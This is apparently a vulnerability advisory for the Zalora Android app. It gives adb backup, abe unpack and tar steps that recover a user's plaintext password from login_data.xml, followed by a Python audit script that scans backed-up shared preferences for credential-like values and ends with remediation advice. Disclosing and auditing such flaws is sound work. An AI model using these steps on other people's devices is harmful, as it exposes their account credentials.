Author: Ender Phan

Description: The Zalora application 6.15.1 for Android stores confidential information insecurely on the system (i.e. in plain text), which allows a non-root user to find out the username/password of a valid user via /data/data/


#Application: Zalora
#Platform: Android
#Version: 6.15.1 (latest)
#Severity: Medium
#Impact: Non-root user can read the password in clear text and log in to the application.


1. Back up the application data to the local PC (adb backup requires a package list or -all; <zalora-package-name> is a placeholder for the app's package name)
adb backup -f ~/zalora.ab -noapk <zalora-package-name>

2. Convert the file "zalora.ab" into a tar file (file contains backup data of
java -jar abe.jar unpack ~/zalora.ab zalora.tar ""

3. Extract the tar file.
tar -xvf zalora.tar

4. After the extraction, go and check the data in the directory located in apps/

5. Look for sensitive data. The password is stored in /shared_prefs/login_data.xml in plain text:

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
    <string name="login_data">{&quot;password&quot;:&quot;P4ssw0rd123&quot;,&quot;email&quot;:&quot;[email protected]&quot;}</string>
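The manual check in step 5 scales poorly once a backup contains dozens of preference files. The following audit script is an added example (not part of the advisory and not Zalora code): it parses Android shared_prefs XML, unwraps JSON serialized into string values the way login_data is, and flags entries whose key names look credential-like. The sample XML, the key-name heuristic (SENSITIVE_KEY_RE) and the assumption that the abe-unpacked layout keeps shared preferences under apps/<pkg>/sp/ are assumptions made for this example.

```python
import json
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Heuristic list of key names that commonly hold secrets (assumption; extend as needed).
SENSITIVE_KEY_RE = re.compile(
    r"(pass(word|wd)?|pwd|secret|token|api[_-]?key|auth|session|credential)", re.I
)

# Constructed sample modelled on the login_data.xml structure quoted in the advisory.
# Android wraps the entries in a <map> element; the value is JSON with &quot;-escaped quotes.
SAMPLE_SHARED_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="login_data">{&quot;password&quot;:&quot;P4ssw0rd123&quot;,&quot;email&quot;:&quot;user@example.com&quot;}</string>
    <string name="theme">dark</string>
    <boolean name="remember_me" value="true" />
    <string name="auth_token">eyJhbGciOi.constructed.value</string>
</map>
"""


def _walk(value, path):
    """Yield (path, leaf) pairs, descending into JSON objects/lists embedded in values."""
    if isinstance(value, dict):
        for k, v in value.items():
            yield from _walk(v, path + [str(k)])
    elif isinstance(value, list):
        for i, v in enumerate(value):
            yield from _walk(v, path + [f"[{i}]"])
    else:
        yield path, value


def _parse_value(text):
    """Unwrap serialized JSON stored in a <string> preference; otherwise return the text."""
    if text is None:
        return None
    stripped = text.strip()
    if stripped and stripped[0] in "{[":
        try:
            return json.loads(stripped)
        except ValueError:
            pass
    return text


def find_plaintext_secrets(xml_text):
    """Return [(key_path, value)] for entries whose key (or nested JSON key) looks credential-like.

    ElementTree decodes the &quot; entities, so the embedded JSON parses directly.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root:  # children of <map>: <string>, <boolean>, <int>, <long>, ...
        name = elem.get("name", "")
        # <string> keeps its payload as element text; primitive types use a value attribute
        raw = elem.text if elem.tag == "string" else elem.get("value")
        for path, leaf in _walk(_parse_value(raw), [name]):
            if leaf not in (None, "") and any(SENSITIVE_KEY_RE.search(p) for p in path):
                findings.append(("/".join(path), str(leaf)))
    return findings


def scan_backup_dir(root_dir):
    """Scan every XML under an extracted backup (shared prefs sit under apps/<pkg>/sp/ in abe output).

    Returns {file_path: [(key_path, value), ...]} for files that contain findings.
    """
    results = {}
    for xml_path in Path(root_dir).rglob("*.xml"):
        try:
            hits = find_plaintext_secrets(xml_path.read_text(encoding="utf-8"))
        except ET.ParseError:
            continue  # not a shared_prefs file (e.g. other XML assets)
        if hits:
            results[str(xml_path)] = hits
    return results


if __name__ == "__main__":
    for key, value in find_plaintext_secrets(SAMPLE_SHARED_PREFS):
        print(f"plaintext secret: {key} = {value!r}")
```

Run it as `python audit_prefs.py` for the embedded sample, or call `scan_backup_dir("apps")` against the directory produced by step 3 to sweep every package in the backup. Any hit is a finding for the app owner to fix by moving the value into the Android Keystore (or EncryptedSharedPreferences) and, where the data need not survive a backup, by disabling `android:allowBackup` for the application.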